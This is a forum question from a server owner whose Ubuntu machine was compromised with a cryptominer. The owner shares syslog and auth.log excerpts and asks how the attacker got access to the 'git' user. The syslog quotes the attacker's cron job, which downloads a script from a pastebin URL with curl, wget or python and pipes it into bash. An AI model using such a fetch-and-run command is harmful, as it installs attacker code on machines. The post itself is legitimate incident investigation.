0

It seems someone gained access to my ubuntu server and installed a cryptominer. This user added a crontab for the user "git" on my server. I disconnected the server from the internet and I am trying to find out how this person gained access to this git user. However I have not found any successful sshd connections. I did find a lot of failed password attemps.

In the sys.log I have found the following:

Jul 15 10:57:25 servername crontab [2816584]: (git) LIST (git)
Jul 15 10:57:25 servername crontab [2816588]: (git) REPLACE (git)
Jul 15 11:09:01 servername CRON[3005313]: (git) CMD ((curl -fsSL https://pastebin.com/rau/LYdmF72J| |uget -q -0- https://pastebin.com/raw/LYdmF72J| |python -c 'Import urllib2 as fb1;print fb1.urlopen("https://pastebin.com/raw/LYdmF72j").read()*)I bash -sh)

In the auth.log I find a lot of failed password attemps with different users including the "git" user. One example of this for a non existing user "testuser":

Jul 9 04:57:07 servername sshd [20569381 :
Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul 9 04:57:10 servername ssh [2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]

A lot of failed password attemps but none seem successful. Can someone help me investigate this?

Thanks in advance.

Davidoffo
  • 3
  • 1
  • @HBruijn thanks I will ook into it. – Davidoffo Aug 18 '23 at 12:22
  • 2
    In general most compromises are the result of a successful exploit of an already (well-) known vulnerability from a piece of software that wasn't patched on your server. – HBruijn Aug 18 '23 at 12:29

0 Answers0